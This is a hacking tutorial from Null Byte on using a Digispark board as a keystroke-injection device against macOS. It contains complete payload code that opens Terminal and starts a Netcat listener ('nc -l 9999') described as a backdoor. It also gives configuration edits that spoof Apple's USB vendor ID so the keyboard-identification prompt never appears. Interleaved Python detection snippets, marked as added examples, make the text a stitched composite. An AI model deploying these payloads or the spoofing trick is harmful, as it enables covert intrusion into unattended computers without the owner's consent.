
How to Hack MacOS with Digispark Ducky Script Payloads «Null Byte :: WonderHowTo



The USB Rubber Ducky and the Digispark board both have the same problem when attacking macOS computers: a keyboard profiler pop-up window that tries to identify non-Apple USB keyboards. Although it is an annoying setback, the solution is a simple modification that allows Mac computers to be targeted, which affects the ability to target Windows and Linux devices. When a non-Apple keyboard is connected to a MacBook, Mac Pro, iMac, etc., macOS tries to identify the newly connected keyboard. This hidden security feature, which lurks in the background on all macOS devices, protects against malicious input from devices like a $50 USB Rubber Ducky or a Digispark. But it can easily be bypassed if the Mac thinks your attack device is an Apple device.


In the battle between Macs and HID (Human Interface Device) attacks, we have macOS on one side with the Keyboard Setup Assistant profiler. The Digispark and the USB Rubber Ducky are on the other side with a macOS payload for Rickrolling users.

When we insert one of the two HID tools into the macOS computer, we are greeted by our nemesis, the keyboard profiler, before the payload has a chance to run.

You can think of the Keyboard Setup Assistant as Clippy. It is meant to help, but it complicates matters. Attempting to navigate through the tool is also terrible because the keyboard is not always profiled correctly. For example, sometimes you need to press the keys again to profile the keyboard, which will not work for a device that cannot respond to feedback. Instead, it's better to work around it than to deal with it at all.

Banishing the Keyboard Profiler

To get rid of the Keyboard Setup Assistant profiler, we must identify what it is complaining about. Deep in the configuration files of the Digispark library, the cause of our problem lies in the configuration option shown below.

  /* -------------------------- Device Description --------------------------- */

  #define USB_CFG_VENDOR_ID 0xc0, 0x16
  /* USB vendor ID for the device, low byte first. If you have registered your
   * own Vendor ID, define it here. Otherwise, you may use one of obdev's free
   * shared VID/PID pairs. Be sure to read the file USB-IDs-for-free.txt for rules!
   * *** IMPORTANT NOTE ***
   * This template uses obdev's shared VID/PID pair for Vendor Class devices
   * with libusb: 0x16c0/0x5dc. Use this VID/PID pair ONLY if you understand
   * the implications!
   */

The problem here is that the vendor ID of "0xc0, 0x16" is not Apple's. Therefore, macOS does not trust it and launches the Keyboard Setup Assistant to identify the intruder. To fix the problem, you can open the Digispark library configuration options and change the vendor ID to the value of an Apple device. The board still works with non-Apple computers, and the Keyboard Setup Assistant is never activated because macOS believes it is talking to a fellow Apple product.

What you need

To follow along, you need a Digispark board. They can be purchased online for $2 to $4 at Amazon or Walmart. AliExpress prices are even lower. Digistump, the official Digispark store, is currently sold out and will be available in early 2020.

The connection to the Digispark may be slightly different depending on the operating system used. For more information and troubleshooting tips, see the DigiSpark Wiki Documentation.

Step 1: Install and Configure the Arduino IDE for the Digispark

I'll assume you have the Arduino IDE installed with support for the Digispark board. I've covered this process in detail in the previous tutorial on running USB Rubber Ducky scripts on a Digispark. Complete step 1 of that tutorial before proceeding to step 2 below.

Step 2: Build a Payload and Customize It for MacOS

First we'll work with the standard payload "RickRoll_Update" provided by CedArtic on GitHub. In the first actions of the payload, the keys KEY_R and MOD_GUI_LEFT are used together to open a run window. However, this does not work on macOS because the hotkeys are different.

  // This Digispark script opens Rick Astley's "Never Gonna Give You Up" and also a
  // fake Windows Update screen, then maximizes it with F11
  #include "DigiKeyboard.h"
  void setup() {
    // empty
  }
  void loop() {
    DigiKeyboard.delay(2000);
    DigiKeyboard.sendKeyStroke(0);
    DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);  // Windows key + R
    DigiKeyboard.delay(600);
    DigiKeyboard.print("https://youtu.be/dQw4w9WgXcQ?t=43s");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(5000);
    DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
    DigiKeyboard.delay(3000);
    DigiKeyboard.print("http://fakeupdate.net/win10u/index.html");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(2000);
    DigiKeyboard.sendKeyStroke(KEY_F11);
    for (;;) { /* empty */ }
  }

To change this, we need to switch the key combination to that of a Mac: the spacebar and the Command key, or KEY_SPACE and MOD_GUI_LEFT. Let's also change the payload so that Terminal opens, a Netcat backdoor is started, the Spotlight search is reopened, and the Rickroll runs. By opening a Netcat backdoor on top of Rickrolling them, we can send them garbage over the network.

  #include "DigiKeyboard.h"
  void setup() {
    // empty
  }
  void loop() {
    DigiKeyboard.delay(2000);
    DigiKeyboard.sendKeyStroke(0);
    DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_GUI_LEFT);  // Command + Space: Spotlight
    DigiKeyboard.delay(600);
    DigiKeyboard.print("Terminal");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(5000);
    DigiKeyboard.print("nc -l 9999");
    DigiKeyboard.delay(1000);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(600);
    DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_GUI_LEFT);
    DigiKeyboard.delay(600);
    DigiKeyboard.print("https://youtu.be/dQw4w9WgXcQ?t=43s");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(5000);

    for (;;) { /* empty */ }
  }

Perfect. The ".sendKeyStroke(KEY_SPACE, MOD_GUI_LEFT);" on line 8 invokes the Spotlight search bar. Line 10's ".print("Terminal");" searches for Terminal, while ".sendKeyStroke(KEY_ENTER);" opens it. Line 13's ".print("nc -l 9999");" types in the netcat command, and Enter is pressed again so we can do what we want on the Mac. Then the Spotlight search reopens and searches for the YouTube video.

You can stop here because the video plays directly in Spotlight Search. However, if you press Enter, it opens in a browser for a larger view. Elegant.
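From the defender's side, the listener this payload leaves behind shows up in the host's socket table. The following added example (not part of the original article) parses text in the format of `lsof -nP -iTCP -sTCP:LISTEN` and flags listeners outside an allowlist; the allowlist, the severity labels and the sample rows are constructed assumptions.

```python
import re

# Assumed per-host allowlist of (command, port); constructed for this example.
ALLOWED = {("sshd", 22), ("cupsd", 631)}
NETCAT_NAMES = {"nc", "ncat", "netcat"}

# COMMAND PID USER ... TCP <addr>:<port> (LISTEN)
ROW = re.compile(r"(\S+)\s+(\d+)\s+(\S+)\s.*\sTCP\s+\S*:(\d+)\s+\(LISTEN\)")

def parse_listeners(lsof_text):
    """Return (command, pid, user, port) for every TCP LISTEN row."""
    rows = []
    for line in lsof_text.splitlines():
        m = ROW.match(line)  # the header row has no numeric PID, so it is skipped
        if m:
            cmd, pid, user, port = m.groups()
            rows.append((cmd, int(pid), user, int(port)))
    return rows

def unexpected_listeners(rows):
    """Flag listeners not on the allowlist; netcat-family tools rank highest."""
    findings = []
    for cmd, pid, user, port in rows:
        if (cmd, port) in ALLOWED:
            continue
        severity = "high" if cmd in NETCAT_NAMES else "review"
        findings.append((severity, cmd, pid, user, port))
    return sorted(findings)

# Constructed sample rows, not captured from a real machine.
SAMPLE = """\
COMMAND   PID  USER   FD   TYPE  DEVICE SIZE/OFF NODE NAME
sshd      101  root    4u  IPv4  0x1a01      0t0  TCP *:22 (LISTEN)
cupsd     202  root    6u  IPv6  0x1a02      0t0  TCP [::1]:631 (LISTEN)
nc       4242  alice   3u  IPv4  0x1a03      0t0  TCP *:9999 (LISTEN)
python3  5150  alice   5u  IPv4  0x1a04      0t0  TCP 127.0.0.1:8000 (LISTEN)
"""

if __name__ == "__main__":
    for finding in unexpected_listeners(parse_listeners(SAMPLE)):
        print(finding)
```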

Pro Tip: Find the key names for Digispark.

If you want to use the Digispark to press different keys on the keyboard, use the following commands to open the DigiKeyboard.h file, which lists all the names you can use, such as KEY_ENTER, KEY_ARROW_LEFT, MOD_CONTROL_LEFT, etc.

Under macOS:

  ~$ nano ~/Library/Arduino15/packages/digistump/hardware/avr/1.6.7/libraries/DigisparkKeyboard/DigiKeyboard.h

Under Linux:

  ~$ nano ~/.arduino15/packages/digistump/hardware/avr/1.6.7/libraries/DigisparkKeyboard/DigiKeyboard.h

Step 3: Change the file usbconfig.h

Now we need to change the configuration file before we can upload the code. Open a terminal window and open the following file in nano.

Under macOS:

  ~$ nano ~/Library/Arduino15/packages/digistump/hardware/avr/1.6.7/libraries/DigisparkKeyboard/usbconfig.h

Under Linux:

  ~$ nano ~/.arduino15/packages/digistump/hardware/avr/1.6.7/libraries/DigisparkKeyboard/usbconfig.h

Navigate to the part of the file that defines the device description, and look for the following line, which sets the USB vendor ID.

  #define USB_CFG_VENDOR_ID 0xc0, 0x16 

Now change the values as shown in the following example, which represents an ID for an Apple device, and save the file.

  #define USB_CFG_VENDOR_ID 0xac, 0x05 

The section should now look like this:

  /* -------------------------- Device Description --------------------------- */

  #define USB_CFG_VENDOR_ID 0xac, 0x05
  /* USB vendor ID for the device, low byte first. If you have registered your
   * own Vendor ID, define it here. Otherwise, you may use one of obdev's free
   * shared VID/PID pairs. Be sure to read the file USB-IDs-for-free.txt for rules!
   * *** IMPORTANT NOTE ***
   * This template uses obdev's shared VID/PID pair for Vendor Class devices
   * with libusb: 0x16c0/0x5dc. Use this VID/PID pair ONLY if you understand
   * the implications!
   */

Once this is done, any code we upload to the Digispark should cause it to identify itself as an Apple device.
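Seen from the host, this change means a device enumerates with Apple's vendor ID while everything else about it stays the same. The following added example (not part of the original article) decodes the low-byte-first define and applies one detection heuristic: flag devices that claim vendor ID 0x05ac but report a vendor string that does not start with "Apple". The input is assumed to resemble `ioreg -p IOUSB -l` output; the sample text and device names are constructed.

```python
import re

APPLE_VID = 0x05AC  # the value usbconfig.h writes as "0xac, 0x05"

def vusb_vid(define_line):
    """Decode '#define USB_CFG_VENDOR_ID lo, hi' (low byte first) to an int."""
    m = re.search(r"USB_CFG_VENDOR_ID\s+(0x[0-9a-fA-F]+)\s*,\s*(0x[0-9a-fA-F]+)",
                  define_line)
    if not m:
        raise ValueError("no USB_CFG_VENDOR_ID define found")
    lo, hi = (int(x, 16) for x in m.groups())
    return (hi << 8) | lo

def parse_ioreg(text):
    """Split ioreg-style text into one property dict per '+-o' device node."""
    devices = []
    for line in text.splitlines():
        node = re.search(r"\+-o (.+?)\s+<class", line)
        if node:
            devices.append({"node": node.group(1)})
            continue
        prop = re.search(r'"([^"]+)" = (?:"([^"]*)"|(\d+))', line)
        if prop and devices:
            key, text_value, number = prop.groups()
            devices[-1][key] = int(number) if number is not None else text_value
    return devices

def suspicious_apple_claims(devices):
    """Heuristic (an assumption of this example): Apple VID, non-Apple vendor string."""
    return [d["node"] for d in devices
            if d.get("idVendor") == APPLE_VID
            and not str(d.get("USB Vendor Name", "")).lower().startswith("apple")]

# Constructed sample, not captured from a real machine.
SAMPLE = '''
+-o Apple Internal Keyboard@14400000  <class AppleUSBDevice, id 0x100000001>
  |   "idVendor" = 1452
  |   "USB Vendor Name" = "Apple Inc."
+-o ExampleKey@14100000  <class AppleUSBDevice, id 0x100000002>
  |   "idVendor" = 1452
  |   "USB Vendor Name" = "example-vendor.invalid"
+-o ExampleMouse@14200000  <class AppleUSBDevice, id 0x100000003>
  |   "idVendor" = 1133
  |   "USB Vendor Name" = "Example Mouse Co."
'''

if __name__ == "__main__":
    print(hex(vusb_vid("#define USB_CFG_VENDOR_ID 0xac, 0x05")))
    print(suspicious_apple_claims(parse_ioreg(SAMPLE)))
```

Descriptor strings are supplied by the device itself, so treat a hit as a lead for review and a clean result as inconclusive.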

Step 4: Push Payload and Test

We need to upload the code to the Digispark to make sure it works. In the Arduino IDE, click the right arrow in the upper left corner of the sketch window. The code is compiled. In the bottom window, Arduino tells you to plug in the Digispark within 60 seconds.

If you see output like that below, you've made it! If not, disconnect and try the upload again. You may also need to adjust the Digispark in the USB port to get it to connect.

For the full impact of the payload, check out the video above. We sent a binary file over the network, which caused a lot of noise and alarming text to scroll across the screen, but you can do anything you want.

MacOS payloads for the Digispark can be easily created

While macOS seems to have a security advantage over computers that are easily victimized by HID attacks, the benefit is negligible at best. Thanks to our simple modification, each computer can be targeted, and macOS is just as vulnerable if it thinks it is communicating with another Apple device.

Close your laptop if you leave it unattended, and be careful not to accidentally connect a Digispark. Unlike the USB Rubber Ducky, which is designed to look like a USB flash drive, the Digispark looks suspicious and alarming and is therefore often a better tool for developing payloads than for actually delivering them.

I hope you have enjoyed this guide to setting up the inexpensive Digispark to attack macOS devices! If you have questions about this Digispark configuration tutorial, leave a comment below and feel free to contact me on Twitter @KodyKinzie.


Cover photo and screenshots by Kody / Null Byte



